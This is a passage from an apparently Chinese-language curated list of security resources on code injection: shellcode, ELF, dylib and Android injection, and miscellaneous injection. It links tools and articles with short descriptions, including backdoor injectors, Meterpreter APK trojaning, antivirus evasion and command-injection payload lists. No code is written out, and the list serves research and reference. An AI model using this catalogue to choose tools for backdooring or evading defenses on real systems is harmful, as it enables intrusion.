V4.20ๅ•่ฟ›็จ‹ๅŠ ๅฃณ็จ‹ๅบโ€•โ€•FTPRush Unicode V1.0.RC6.build.568](https://bbs.pediy.com/thread-15403.htm) - 2005.06 [pediy] [Hying's Armor v0.7x Code Injection](https://bbs.pediy.com/thread-14294.htm) - 2005.05 [pediy] [EnCryptPE v2 Code injection](https://bbs.pediy.com/thread-13896.htm) - 2005.05 [pediy] [ARM3.7x-4.1CopyMEMII Code injection](https://bbs.pediy.com/thread-13656.htm) - 2005.04 [pediy] [OBSIDIUM 1.25 Code Injection](https://bbs.pediy.com/thread-13283.htm) - 2005.04 [pediy] [Armadillo 3.7X-4.X Code Injection](https://bbs.pediy.com/thread-13280.htm) - 2004.09 [pediy] [[็ฟป่ฏ‘]ๅˆฉ็”จไปฃ็ ๆณจๅ…ฅ่„ฑๅฃณ](https://bbs.pediy.com/thread-4541.htm) # <a id="a5458e6ee001b754816237b9a2108569"></a>Shellcodeๆณจๅ…ฅ *** ## <a id="28e1b534eae8d37d8fc1d212f0db0263"></a>ๅทฅๅ…ท - [**2209**ๆ˜Ÿ][4m] [Py] [trustedsec/unicorn](https://github.com/trustedsec/unicorn) ้€š่ฟ‡PowerShell้™็บงๆ”ปๅ‡ป, ็›ดๆŽฅๅฐ†Shellcodeๆณจๅ…ฅๅˆฐๅ†…ๅญ˜ - [**476**ๆ˜Ÿ][21d] [Py] [trustedsec/meterssh](https://github.com/trustedsec/meterssh) ๅฐ†Shellcodeๆณจๅ…ฅๅ†…ๅญ˜๏ผŒ็„ถๅŽ้€š่ฟ‡SSH้šง้“ไผ ่พ“๏ผˆ็ซฏๅฃไปป้€‰๏ผŒๅนถไผช่ฃ…ๆˆๆ™ฎ้€šSSH่ฟžๆŽฅ๏ผ‰ - [**225**ๆ˜Ÿ][4m] [PS] [outflanknl/excel4-dcom](https://github.com/outflanknl/excel4-dcom) PowerShellๅ’ŒCobalt Strike่„šๆœฌ๏ผŒ้€š่ฟ‡DCOMๆ‰ง่กŒExcel4.0/XLMๅฎๅฎž็Žฐๆจชๅ‘ๆธ—้€๏ผˆ็›ดๆŽฅๅ‘Excel.exeๆณจๅ…ฅShellcode๏ผ‰ - [**112**ๆ˜Ÿ][2m] [C++] [josh0xa/threadboat](https://github.com/josh0xA/ThreadBoat) ไฝฟ็”จ็บฟ็จ‹ๆ‰ง่กŒๅŠซๆŒๅฐ†ๆœฌๆœบshellcodeๆณจๅ…ฅๅˆฐๆ ‡ๅ‡†็š„Win32ๅบ”็”จ็จ‹ๅบไธญ - [**77**ๆ˜Ÿ][4m] [C] [dimopouloselias/simpleshellcodeinjector](https://github.com/dimopouloselias/simpleshellcodeinjector) ๆŽฅๆ”ถๅๅ…ญ่ฟ›ๅˆถ็š„shellcodeไฝœไธบๅ‚ๆ•ฐๅนถๆ‰ง่กŒๅฎƒ - [**66**ๆ˜Ÿ][2m] [Py] [sensepost/anapickle](https://github.com/sensepost/anapickle) ็”จPython็š„Pickle่ฏญ่จ€็ผ–ๅ†™shellcodeๅ’Œๆ“ไฝœPickleๆณจๅ…ฅshellcode็š„ๅทฅๅ…ท้›†ใ€‚ - [**43**ๆ˜Ÿ][1m] [Py] [borjamerino/tlsinjector](https://github.com/borjamerino/tlsinjector) Python script to inject and run shellcodes through TLS callbacks - [**27**ๆ˜Ÿ][2y] [Py] [taroballzchen/shecodject](https://github.com/TaroballzChen/shecodject) shecodject is a autoscript for shellcode injection by Python3 programing - [**19**ๆ˜Ÿ][5y] [C] [jorik041/cymothoa](https://github.com/jorik041/cymothoa) Cymothoa is a backdooring tool, that inject backdoor's shellcode directly into running applications. Stealth and lightweight... - [**16**ๆ˜Ÿ][9m] [PLpgSQL] [michaelburge/redshift-shellcode](https://github.com/michaelburge/redshift-shellcode) Example of injecting x64 shellcode into Amazon Redshift - [**10**ๆ˜Ÿ][1y] [C++] [egebalci/injector](https://github.com/egebalci/injector) Simple shellcode injector. - [**4**ๆ˜Ÿ][3y] [Shell] [thepisode/linux-shellcode-generator](https://github.com/thepisode/linux-shellcode-generator) Experiments on Linux Assembly shellcodes injection - [**None**ๆ˜Ÿ][Go] [pioneerhfy/goback](https://github.com/pioneerhfy/goback) GOback is a backdoor written in GO that use shellcode injection technique for achiving its task. *** ## <a id="c6942bb5275f5b62a41238c6042b2b81"></a>ๆ–‡็ซ  - 2020.03 [hakin9] [Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory.](https://hakin9.org/unicorn-is-a-simple-tool-for-using-a-powershell-downgrade-attack-and-inject-shellcode-straight-into-memory/) - 2019.12 [aliyun] [ๆ‰‹ๅทฅshellcodeๆณจๅ…ฅPEๆ–‡ไปถ](https://xz.aliyun.com/t/6939) - 2019.11 [4hou] [ไปฃ็ ๆณจๅ…ฅๆŠ€ๆœฏไน‹Shellcodeๆณจๅ…ฅ](https://www.4hou.com/web/21784.html) - 2019.11 [ColinHardy] [Excel 4.0 Macros Analysis - Cobalt Strike Shellcode Injection](https://www.youtube.com/watch?v=XnN_UWfHlNM) - 2019.06 [360] [ArmๅนณๅฐPtraceๆณจๅ…ฅshellcodeๆŠ€ๆœฏ](https://www.anquanke.com/post/id/179985/) - 2018.09 [pediy] [[ๅˆ†ไบซ]็ปๅฏน็‰›้€ผๅ“„ๅ“„็š„shellcodeๅ†…ๅญ˜ๆณจๅ…ฅ,ๆ”ฏๆŒ64,32,่ฟœ็จ‹ๅ†…ๅญ˜ๆณจๅ…ฅ,ๆ”ฏๆŒVMPๅฃณๆœ€ๅคงๅผบๅบฆไฟๆŠค](https://bbs.pediy.com/thread-246934.htm) - 2018.05 [cobaltstrike] [PowerShell Shellcode Injection on Win 10ย (v1803)](https://blog.cobaltstrike.com/2018/05/24/powershell-shellcode-injection-on-win-10-v1803/) - 2017.12 [pentesttoolz] [Shecodject โ€“ Autoscript for Shellcode Injection](https://pentesttoolz.com/2017/12/30/shecodject-autoscript-for-shellcode-injection/) - 2017.12 [MalwareAnalysisForHedgehogs] [Malware Analysis - ROKRAT Unpacking from Injected Shellcode](https://www.youtube.com/watch?v=uoBQE5s2ba4) - 2017.11 [freebuf] [Metasploit่‡ชๅŠจๅŒ–Bypass Av่„šๆœฌ๏ผšShecodject X Shellcode Injection](http://www.freebuf.com/sectool/154356.html) - 2017.01 [christophertruncer] [Shellcode Generation, Manipulation, and Injection in Python 3](https://www.christophertruncer.com/shellcode-manipulation-and-injection-in-python-3/) - 2015.12 [dhavalkapil] [Shellcode Injection](https://dhavalkapil.com/blogs/Shellcode-Injection/) - 2015.12 [n0where] [Dynamic Shellcode Injection: Shellter](https://n0where.net/dynamic-shellcode-injection-shellter) - 2015.10 [freebuf] [Kali Shellter 5.1๏ผšๅŠจๆ€ShellCodeๆณจๅ…ฅๅทฅๅ…ท ็ป•่ฟ‡ๅฎ‰ๅ…จ่ฝฏไปถ](http://www.freebuf.com/sectool/81955.html) - 2015.07 [BsidesLisbon] [BSidesLisbon2015 - Shellter - A dynamic shellcode injector - Kyriakos Economou](https://www.youtube.com/watch?v=TunWNHYrWp8) - 2015.06 [freebuf] [ๅŠจๆ€Shellcodeๆณจๅ…ฅๅทฅๅ…ท โ€“ Shellter](http://www.freebuf.com/sectool/71230.html) - 2015.06 [shelliscoming] [TLS Injector: running shellcodes through TLS callbacks](http://www.shelliscoming.com/2015/06/tls-injector-running-shellcodes-through.html) - 2014.08 [toolswatch] [Shellter v1.7 A Dynamic ShellCode Injector โ€“ Released](http://www.toolswatch.org/2014/08/shellter-v1-7-a-dynamic-shellcode-injector-released/) - 2014.06 [toolswatch] [[New Tool] Shellter v1.0 A Dynamic ShellCode Injector โ€“ Released](http://www.toolswatch.org/2014/06/new-tool-shellter-v1-0-a-dynamic-shellcode-injector-released/) - 2013.06 [debasish] [Injecting Shellcode into a Portable Executable(PE) using Python](http://www.debasish.in/2013/06/injecting-shellcode-into-portable.html) - 2013.05 [trustedsec] [Native PowerShell x86 Shellcode Injection on 64-bit Platforms](https://www.trustedsec.com/2013/05/native-powershell-x86-shellcode-injection-on-64-bit-platforms/) - 2013.05 [pediy] [[ๅŽŸๅˆ›]ๅ†…ๆ ธShellCodeๆณจๅ…ฅ็š„ไธ€็งๆ–นๆณ•](https://bbs.pediy.com/thread-170959.htm) - 2012.10 [hackingarticles] [Cymothoa โ€“ Runtime shellcode injection Backdoors](http://www.hackingarticles.in/cymothoa-runtime-shellcode-injection-for-stealthy-backdoors/) - 2012.09 [hackingarticles] [PyInjector Shellcode Injection attack on Remote PC using Social Engineering Toolkit](http://www.hackingarticles.in/pyinjector-shellcode-injection-attack-on-remote-windows-pc-using-social-engineering-toolkit/) - 2012.08 [trustedsec] [New tool PyInjector Released โ€“ Python Shellcode Injection](https://www.trustedsec.com/2012/08/new-tool-pyinjector-released-python-shellcode-injection/) - 2007.01 [pediy] [ใ€ŠThe Shellcoder's handbookใ€‹็ฌฌๅๅ››็ซ _ๆ•…้šœๆณจๅ…ฅ](https://bbs.pediy.com/thread-38713.htm) # <a id="3584002eaa30b92479c1e1c2fc6ce4ef"></a>ELFๆณจๅ…ฅ *** ## <a id="b423b830472372349203f88cf64c6814"></a>ๅทฅๅ…ท - [**269**ๆ˜Ÿ][10d] [Shell] [cytopia/pwncat](https://github.com/cytopia/pwncat) pwncat - netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE) - [**106**ๆ˜Ÿ][14d] [C] [comsecuris/luaqemu](https://github.com/comsecuris/luaqemu) QEMU-based framework exposing several of QEMU-internal APIs to a LuaJIT core injected into QEMU itself. Among other things, this allows fast prototyping of target systems without any native code and minimal effort in Lua. - [**73**ๆ˜Ÿ][10d] [C] [zznop/drow](https://github.com/zznop/drow) Injects code into ELF executables post-build - [**45**ๆ˜Ÿ][1m] [C] [jmpews/evilelf](https://github.com/jmpews/evilelf) Malicious use of ELF such as .so inject, func hook and so on. - [**26**ๆ˜Ÿ][4m] [C++] [shaxzy/nixware-csgo](https://github.com/shaxzy/nixware-csgo) Source code of Nixware. Cheat doesn't inject for some reason, fix it uself or just paste from it - [**9**ๆ˜Ÿ][3m] [C] [mfaerevaag/elfinjector](https://github.com/mfaerevaag/elfinjector) Code injector for ELF binaries (incl. PIE) - [**1**ๆ˜Ÿ][2y] [JS] [mshoop/web-xss-attack](https://github.com/mshoop/web-xss-attack) Exploring website security through cross-site scripting attacks, maliciously injected JavaScript and self-propagating worms *** ## <a id="0a853f9e3f9ccb0663007d3a508ce02b"></a>ๆ–‡็ซ  - 2020.02 [advancedpersistentjest] [Fault Injection on Linux: Practical KERNELFAULT-Style Attacks](https://advancedpersistentjest.com/2020/02/15/fault-injection-on-linux-practical-kernelfault-style-attacks/) - 2018.08 [0x00sec] [Issues with elf file injection tutorial by pico](https://0x00sec.org/t/issues-with-elf-file-injection-tutorial-by-pico/8029/) - 2017.12 [MSbluehat] [BlueHat v17 || KERNELFAULT: R00ting the Unexploitable using Hardware Fault Injection](https://www.slideshare.net/MSbluehat/kernelfault-r00ting-the-unexploitable-using-hardware-fault-injection) - 2016.05 [0x00sec] [ELFun File Injector](https://0x00sec.org/t/elfun-file-injector/410/) - 2016.04 [backtrace] [ELF shared library injection forensics](https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/) - 2014.02 [malwarebytes] [How to Unpack a Self-Injecting Citadel Trojan](https://blog.malwarebytes.com/threat-analysis/2014/02/how-to-unpack-a-self-injecting-citadel-trojan/) - 2014.02 [evilsocket] [Termination and Injection Self Defense on Windows >= Vista SP1](https://www.evilsocket.net/2014/02/05/termination-and-injection-self-defense-on-windows/) - 2010.03 [publicintelligence] [ELF/VLF Wave-injection and Magnetospheric Probing with HAARP](https://publicintelligence.net/elfvlf-wave-injection-and-magnetospheric-probing-with-haarp/) # <a id="108c798de24e7ce6fde0cafe99eec5b3"></a>Dylibๆณจๅ…ฅ *** ## <a id="12df48702564d73c275c72133546d73e"></a>ๅทฅๅ…ท - [**2032**ๆ˜Ÿ][3y] [Swift] [urinx/iosapphook](https://github.com/urinx/iosapphook) ไธ“ๆณจไบŽ้ž่ถŠ็‹ฑ็Žฏๅขƒไธ‹iOSๅบ”็”จ้€†ๅ‘็ ”็ฉถ๏ผŒไปŽdylibๆณจๅ…ฅ๏ผŒๅบ”็”จ้‡็ญพๅๅˆฐApp Hook - [**752**ๆ˜Ÿ][5y] [ObjC] [kjcracks/yololib](https://github.com/kjcracks/yololib) dylib injector for mach-o binaries - [**506**ๆ˜Ÿ][13d] [Objective-C++] [bishopfox/bfinject](https://github.com/bishopfox/bfinject) Dylib injection for iOS 11.0 - 11.1.2 with LiberiOS and Electra jailbreaks - [**191**ๆ˜Ÿ][3m] [Swift] [codesourse/iinjection](https://github.com/codesourse/iinjection) an app for OS X that can inject dylib and (re)sign apps and bundle them into ipa files that are ready to be installed on an iOS device. - [**173**ๆ˜Ÿ][16d] [C] [scen/osxinj](https://github.com/scen/osxinj) osx dylib injection *** ## <a id="0af1332c6476d1a8f98046542e925282"></a>ๆ–‡็ซ  - 2014.05 [pediy] [[ๅŽŸๅˆ›]iOSไธ‹่ฟœ็จ‹่ฟ›็จ‹ๆณจๅ…ฅdylibๆบ็ ](https://bbs.pediy.com/thread-187833.htm) # <a id="06fc9c584b797f97731e3c49886dcc08"></a>Android *** ## <a id="4c02a0ba65fa4f582ec590ce1e070822"></a>ๅทฅๅ…ท - [**1300**ๆ˜Ÿ][4m] [JS] [megatronking/httpcanary](https://github.com/megatronking/httpcanary) ไธ€ไธชๅผบๅคง็š„ๆ•่Žทๅ’Œๆณจๅ…ฅๅทฅๅ…ท็š„Androidๅนณๅฐ - [**475**ๆ˜Ÿ][3y] [Smali] [sensepost/kwetza](https://github.com/sensepost/kwetza) Python ่„šๆœฌ๏ผŒๅฐ† Meterpreter payload ๆณจๅ…ฅ Andorid App - [**447**ๆ˜Ÿ][9m] [Java] [megatronking/netbare](https://github.com/megatronking/netbare) Net packets capture & injection library designed for Android - [**252**ๆ˜Ÿ][16d] [Py] [feicong/jni_helper](https://github.com/feicong/jni_helper) AndroidSO่‡ชๅŠจๅŒ–ๅˆ†ๆžๅทฅๅ…ท๏ผˆ้ž่™ซ๏ผ‰ - [**148**ๆ˜Ÿ][4m] [Java] [zhouat/inject-hook](https://github.com/zhouat/inject-hook) for android - [**144**ๆ˜Ÿ][3y] [C] [xmikos/setools-android](https://github.com/xmikos/setools-android) Unofficial port of setools to Android with additional sepolicy-inject utility included - [**136**ๆ˜Ÿ][11d] [Lua] [lanoox/luject](https://github.com/lanoox/luject) A static injector of dynamic library for application (android, iphoneos, macOS, windows, linux) - [**122**ๆ˜Ÿ][5y] [irsl/adb-backup-apk-injection](https://github.com/irsl/adb-backup-apk-injection) Android ADB backup APK Injection POC - [**97**ๆ˜Ÿ][4y] [Shell] [jlrodriguezf/whatspwn](https://github.com/jlrodriguezf/whatspwn) Linux tool used to extract sensitive data, inject backdoor or drop remote shells on android devices. - [**76**ๆ˜Ÿ][4y] [Py] [moosd/needle](https://github.com/moosd/needle) Android framework injection made easy - [**56**ๆ˜Ÿ][4m] [C] [shunix/tinyinjector](https://github.com/shunix/tinyinjector) Shared Library Injector on Android - [**55**ๆ˜Ÿ][4m] [Java] [igio90/fridaandroidinjector](https://github.com/igio90/fridaandroidinjector) Inject frida agents on local processes through an Android app - [**52**ๆ˜Ÿ][2m] [Py] [alessandroz/pupy](https://github.com/alessandroz/pupy) Python็ผ–ๅ†™็š„่ฟœๆŽงใ€ๅŽๆธ—้€ๅทฅๅ…ท๏ผŒ่ทจๅนณๅฐ๏ผˆWindows, Linux, OSX, Android๏ผ‰ - [**52**ๆ˜Ÿ][14d] [TS] [whid-injector/whid-mobile-connector](https://github.com/whid-injector/whid-mobile-connector) Android Mobile App for Controlling WHID Injector remotely. - [**48**ๆ˜Ÿ][16d] [Py] [ikoz/jdwp-lib-injector](https://github.com/ikoz/jdwp-lib-injector) inject native shared libraries into debuggable Android applications - [**46**ๆ˜Ÿ][30d] [Shell] [jbreed/apkinjector](https://github.com/jbreed/apkinjector) Android APK Antivirus evasion for msfvenom generated payloads to inject into another APK file for phishing attacks. - [**40**ๆ˜Ÿ][8m] [Java] [ivianuu/contributer](https://github.com/ivianuu/contributer) Inject all types like views or a conductor controllers with @ContributesAndroidInjector - [**33**ๆ˜Ÿ][1y] [Groovy] [eastwoodyang/autoinject](https://github.com/eastwoodyang/autoinject) Android ้€š็”จ็š„็ป„ไปถ่‡ชๅŠจๆณจๅ†Œใ€่‡ชๅŠจๅˆๅง‹ๅŒ–่งฃๅ†ณๆ–นๆกˆ - [**30**ๆ˜Ÿ][6m] [Java] [cristianturetta/mad-spy](https://github.com/cristianturetta/mad-spy) ไธ€ไธช็”จไบŽๆ•™่‚ฒ็›ฎ็š„็š„ๆถๆ„่ฝฏไปถ - [**24**ๆ˜Ÿ][5m] [Smali] [aress31/sci](https://github.com/aress31/sci) ็”จไบŽๅœจAndroidๅบ”็”จ็จ‹ๅบไธญ่‡ชๅŠจๅŒ–ๆฑ‡็ผ–ไปฃ็ ๆณจๅ…ฅ(trojanting)่ฟ‡็จ‹็š„ๆก†ๆžถ - [**13**ๆ˜Ÿ][11m] [JS] [cheverebe/android-malware](https://github.com/cheverebe/android-malware) Injected malicious code into legitimate andoid applications. Converted a keyboard app into a keylogger and an MP3 downloader into an image thief. *** ## <a id="9ff27f3143a5c619b554185069ecffb0"></a>ๆ–‡็ซ  - 2018.01 [pediy] [[ๅˆ†ไบซ][ๅŽŸๅˆ›]ไฟฎๆ”นandroid app_process elf (ๅฎž็Žฐrrrfffๅคง็ฅž <androidๅ…จๅฑ€ๆณจๅ…ฅ>็ฌฌไธ€ๆญฅ)](https://bbs.pediy.com/thread-224297.htm) - 2017.08 [360] [Dvmap๏ผš็ฌฌไธ€ๆฌพไฝฟ็”จไปฃ็ ๆณจๅ…ฅ็š„Androidๆถๆ„่ฝฏไปถ](https://www.anquanke.com/post/id/86648/) - 2017.06 [4hou] [ๅฐๅฟƒ๏ผGoogle Play ไธญๅ‡บ็Žฐ้ฆ–ไธชไฝฟ็”จไปฃ็ ๆณจๅ…ฅAndroidๆถๆ„่ฝฏไปถโ€”โ€”Dvmap](http://www.4hou.com/vulnerable/5364.html) - 2017.06 [securelist] [ๅกๅทดๆ–ฏๅŸบ้ฆ–ๆฌกๅ‘็Žฐไปฃ็ ๆณจๅ…ฅ็š„ Android ๆถๆ„ App๏ผš่ฟ่กŒๆ—ถๅฐ†ๆถๆ„ไปฃ็ ๆณจๅ…ฅ็ณป็ปŸๅบ“ libdmv.so ๆˆ–่€… libandroid_runtime.soใ€‚ๆญคๆถๆ„ App ็”š่‡ณๆ”ฏๆŒ64ไฝ Android ็ณป็ปŸ](https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/) - 2015.05 [evilsocket] [Android Native API Hooking With Library Injection and ELF Introspection.](https://www.evilsocket.net/2015/05/04/android-native-api-hooking-with-library-injecto/) - 2015.05 [evilsocket] [Dynamically Inject a Shared Library Into a Running Process on Android/ARM](https://www.evilsocket.net/2015/05/01/dynamically-inject-a-shared-library-into-a-running-process-on-androidarm/) - 2011.10 [pediy] [[ๅŽŸๅˆ›]ๅ‘ไธชAndroidๅนณๅฐไธŠ็š„ๆณจๅ…ฅไปฃ็ ](https://bbs.pediy.com/thread-141355.htm) - 2011.09 [winsunxu] [androidๆณจๅ…ฅไปฃ็ ไน‹ๆณจๅ…ฅ็ฑปๆ–นๆณ•](https://blog.csdn.net/winsunxu/article/details/6771905) - 2011.09 [winsunxu] [androidๆณจๅ…ฅไปฃ็ ๏ผŒๅ†่ฎฎๅฏ„ๅญ˜ๅ™จๅนณ่กก](https://blog.csdn.net/winsunxu/article/details/6756857) - 2011.09 [winsunxu] [android ไปฃ็ ๆณจๅ…ฅ ๅดฉๆบƒ ่งฃๅ†ณๆ–นๆณ•](https://blog.csdn.net/winsunxu/article/details/6742838) # <a id="4ffa5c3eb1f3b85e4c38f6863f5b76b2"></a>ๅ…ถไป– *** ## <a id="fd5f8ada2d4f47c63c3635427873c79c"></a>ๅทฅๅ…ท - [**1044**ๆ˜Ÿ][11d] [Go] [banzaicloud/bank-vaults](https://github.com/banzaicloud/bank-vaults) A Vault swiss-army knife: a K8s operator, Go client with automatic token renewal, automatic configuration, multiple unseal options and more. A CLI tool to init, unseal and configure Vault (auth methods, secret engines). Direct secret injection into Pods. - [**980**ๆ˜Ÿ][12d] [Perl] [infobyte/evilgrade](https://github.com/infobyte/evilgrade) ไพ›ๅบ”้“พๆ”ปๅ‡ป: ๆณจๅ…ฅ่™šๅ‡็š„update - [**920**ๆ˜Ÿ][4m] [C++] [whid-injector/whid](https://github.com/whid-injector/whid) WiFi HID Injector - An USB Rubberducky / BadUSB On Steroids. - [**877**ๆ˜Ÿ][7m] [C] [spacehuhn/wifi_ducky](https://github.com/spacehuhn/wifi_ducky) ไฝฟ็”จESP8266 + ATMEGA32U4๏ผŒ่ฟœ็จ‹ไธŠไผ ใ€ไฟๅญ˜ๅ’Œ่ฟ่กŒๆŒ‰้”ฎๆณจๅ…ฅPayload - [**577**ๆ˜Ÿ][19d] [TS] [samdenty/injectify](https://github.com/samdenty/injectify) ๅฏน็ฝ‘็ซ™ๅฎž่กŒไธญ้—ดไบบๆ”ปๅ‡ป็š„ๆก†ๆžถ - [**559**ๆ˜Ÿ][28d] [Py] [shellphish/fuzzer](https://github.com/shellphish/fuzzer) Americanfuzzy lop ็š„ Python ็‰ˆๆœฌๆŽฅๅฃ - [**555**ๆ˜Ÿ][11d] [C] [libnet/libnet](https://github.com/libnet/libnet) ๅˆ›ๅปบๅ’Œๆณจๅ…ฅ็ฝ‘็ปœๆ•ฐๆฎๅŒ… - [**509**ๆ˜Ÿ][10d] [C] [nongiach/sudo_inject](https://github.com/nongiach/sudo_inject) [Linux] Two Privilege Escalation techniques abusing sudo token - [**501**ๆ˜Ÿ][7m] [C] [hasherezade/demos](https://github.com/hasherezade/demos) Demos of various injection techniques found in malware - [**463**ๆ˜Ÿ][12d] [Perl] [chinarulezzz/pixload](https://github.com/chinarulezzz/pixload) Image Payload Creating/Injecting tools - [**427**ๆ˜Ÿ][11d] [payloadbox/command-injection-payload-list](https://github.com/payloadbox/command-injection-payload-list) ไธ€็งๆ”ปๅ‡ป๏ผŒๅ…ถ็›ฎๆ ‡ๆ˜ฏ้€š่ฟ‡ๆ˜“ๅ—ๆ”ปๅ‡ป็š„ๅบ”็”จ็จ‹ๅบๅœจไธปๆœบๆ“ไฝœ็ณป็ปŸไธŠๆ‰ง่กŒไปปๆ„ๅ‘ฝไปค - [**420**ๆ˜Ÿ][2y] [C++] [rootm0s/injectors](https://github.com/rootm0s/injectors) DLL/Shellcode injection techniques - [**380**ๆ˜Ÿ][15d] [veracode-research/solr-injection](https://github.com/veracode-research/solr-injection) Apache Solrๆณจๅ…ฅ็ ”็ฉถ - [**380**ๆ˜Ÿ][15d] [veracode-research/solr-injection](https://github.com/veracode-research/solr-injection) Apache Solr Injection Research - [**356**ๆ˜Ÿ][8d] [C++] [spacehuhntech/wifiduck](https://github.com/SpacehuhnTech/WiFiDuck) Wireless keystroke injection attack platform - [**320**ๆ˜Ÿ][2y] [C++] [exploitagency/esploitv2](https://github.com/exploitagency/esploitv2) ไธบAtmega 32u4/ESP8266้€š่ฟ‡ไธฒๅฃ้…ๅฏน่ฎพ่ฎก็š„WiFiๆŒ‰้”ฎๆณจๅฐ„ๅทฅๅ…ท(Cactus WHIDๅ›บไปถ)ใ€‚่ฟ˜ๆไพ›ไบ†ไธฒ่กŒใ€HTTPๅ’ŒPASV FTP่ฟ‡ๆปคๆ–นๆณ•๏ผŒไปฅๅŠๅไธบESPortal็š„้›†ๆˆๅ‡ญๆฎๆ”ถๅ‰ฒๆœบ้’“้ฑผๅทฅๅ…ทใ€‚ - [**317**ๆ˜Ÿ][10d] [Py] [pmsosa/duckhunt](https://github.com/pmsosa/duckhunt) Prevent RubberDucky (or other keystroke injection) attacks - [**308**ๆ˜Ÿ][12d] [C] [pulkin/esp8266-injection-example](https://github.com/pulkin/esp8266-injection-example) Example project to demonstrate packet injection / sniffer capabilities of ESP8266 IC. - [**299**ๆ˜Ÿ][18d] [HTML] [dxa4481/cssinjection](https://github.com/dxa4481/cssinjection) Stealing CSRF tokens with CSS injection (without iFrames) - [**297**ๆ˜Ÿ][2y] [C] [can1357/theperfectinjector](https://github.com/can1357/theperfectinjector) Literally, the perfect injector. - [**284**ๆ˜Ÿ][4m] [C++] [fransbouma/injectablegenericcamerasystem](https://github.com/fransbouma/injectablegenericcamerasystem) This is a generic camera system to be used as the base for cameras for taking screenshots within games. The main purpose of the system is to hijack the in-game 3D camera by overwriting values in its camera structure with our own values so we can control where the camera is located, it's pitch/yaw/roll values, its FoV and the camera's look vector. - [**265**ๆ˜Ÿ][19d] [C] [astsam/rtl8812au](https://github.com/astsam/rtl8812au) RTL8812AU/21AU and RTL8814AU driver with monitor mode and frame injection - [**265**ๆ˜Ÿ][17d] [Java] [portswigger/collaborator-everywhere](https://github.com/portswigger/collaborator-everywhere) Burp Suite ๆ‰ฉๅฑ•๏ผŒ้€š่ฟ‡ๆณจๅ…ฅ้žไพตๅ…ฅๆ€ง headers ๆฅๅขžๅผบไปฃ็†ๆต้‡๏ผŒ้€š่ฟ‡ๅผ•่ตท Pingback ๅˆฐ Burp Collaborator ๆฅๆญ้œฒๅŽ็ซฏ็ณป็ปŸ - [**264**ๆ˜Ÿ][2y] [Py] [thetwitchy/xxer](https://github.com/thetwitchy/xxer) A blind XXE injection callback handler. Uses HTTP and FTP to extract information. Originally written in Ruby by ONsec-Lab. - [**255**ๆ˜Ÿ][14d] [Py] [nteseyes/pylane](https://github.com/nteseyes/pylane) An python vm injector with debug tools, based on gdb. - [**254**ๆ˜Ÿ][16d] [C] [klsecservices/invoke-vnc](https://github.com/klsecservices/Invoke-Vnc) executes a VNC agent in-memory and initiates a reverse connection, or binds to a specified port. - [**242**ๆ˜Ÿ][11d] [JS] [sjitech/proxy-login-automator](https://github.com/sjitech/proxy-login-automator) A single node.js script to automatically inject user/password to http proxy server via a local forwarder - [**215**ๆ˜Ÿ][12d] [Py] [google/ukip](https://github.com/google/ukip) USB Keystroke Injection Protection - [**212**ๆ˜Ÿ][2y] [HTML] [xsscx/commodity-injection-signatures](https://github.com/xsscx/commodity-injection-signatures) Commodity Injection Signatures, Malicious Inputs, XSS, HTTP Header Injection, XXE, RCE, Javascript, XSLT - [**211**ๆ˜Ÿ][12d] [C++] [hiitiger/gelectron](https://github.com/hiitiger/gelectron) gameoverlay solution for Electron, Qt and CEF, just like discord game overlay and steam game overlay, inject any app to overlay in your game - [**197**ๆ˜Ÿ][5y] [Py] [offensivepython/pinject](https://github.com/OffensivePython/Pinject) Raw Packet Injection tool - [**170**ๆ˜Ÿ][3y] [HTML] [threatexpress/metatwin](https://github.com/threatexpress/metatwin) The project is designed as a file resource cloner. Metadata, including digital signature, is extracted from one file and injected into another. - [**158**ๆ˜Ÿ][11d] [C] [aircrack-ng/rtl8188eus](https://github.com/aircrack-ng/rtl8188eus) RealTek RTL8188eus WiFi driver with monitor mode & frame injection support - [**157**ๆ˜Ÿ][7d] [icehacks/survivcheatinjector](https://github.com/icehacks/survivcheatinjector) An actual, updated, surviv.io cheat. Works great and we reply fast. - [**149**ๆ˜Ÿ][25d] [Shell] [depoon/iosdylibinjectiondemo](https://github.com/depoon/iosdylibinjectiondemo) Using this Repository to demo how to inject dynamic libraries into cracked ipa files for jailed iOS devices - [**144**ๆ˜Ÿ][2m] [Py] [shengqi158/pyvulhunter](https://github.com/shengqi158/pyvulhunter) python audit tool ๅฎก่ฎก ๆณจๅ…ฅ inject - [**141**ๆ˜Ÿ][18d] [Ruby] [dry-rb/dry-auto_inject](https://github.com/dry-rb/dry-auto_inject) Container-agnostic constructor injection mixin - [**140**ๆ˜Ÿ][12d] [Go] [malfunkt/arpfox](https://github.com/malfunkt/arpfox) An arpspoof alternative (written in Go) that injects spoofed ARP packets into a LAN. - [**135**ๆ˜Ÿ][16d] [Py] [cr0hn/enteletaor](https://github.com/cr0hn/enteletaor) Message Queue & Broker Injection tool - [**134**ๆ˜Ÿ][3m] [C++] [michalmonday/supremeduck](https://github.com/michalmonday/supremeduck) USB keystroke injector controlled by smartphone. - [**131**ๆ˜Ÿ][5y] [Py] [ricterz/websocket-injection](https://github.com/ricterz/websocket-injection) WebSocket ไธญ่ฝฌๆณจๅ…ฅๅทฅๅ…ท - [**127**ๆ˜Ÿ][18d] [Py] [mandatoryprogrammer/xsshunter_client](https://github.com/mandatoryprogrammer/xsshunter_client) Correlated injection proxy tool for XSS Hunter - [**126**ๆ˜Ÿ][3y] [Batchfile] [3gstudent/clr-injection](https://github.com/3gstudent/clr-injection) Use CLR to inject all the .NET apps - [**123**ๆ˜Ÿ][4m] [ObjC] [smilezxlee/zxhookdetection](https://github.com/smilezxlee/zxhookdetection) ใ€iOSๅบ”็”จๅฎ‰ๅ…จใ€‘hookๅŠ่ถŠ็‹ฑ็š„ๅŸบๆœฌ้˜ฒๆŠคไธŽๆฃ€ๆต‹(ๅŠจๆ€ๅบ“ๆณจๅ…ฅๆฃ€ๆต‹ใ€hookๆฃ€ๆต‹ไธŽ้˜ฒๆŠคใ€่ถŠ็‹ฑๆฃ€ๆต‹ใ€็ญพๅๆ ก้ชŒใ€IDAๅ็ผ–่ฏ‘ๅˆ†ๆžๅŠ ๅฏ†ๅ่ฎฎ็คบไพ‹) - [**118**ๆ˜Ÿ][2y] [C#] [malcomvetter/managedinjection](https://github.com/malcomvetter/managedinjection) A proof of concept for dynamically loading .net assemblies at runtime with only a minimal convention 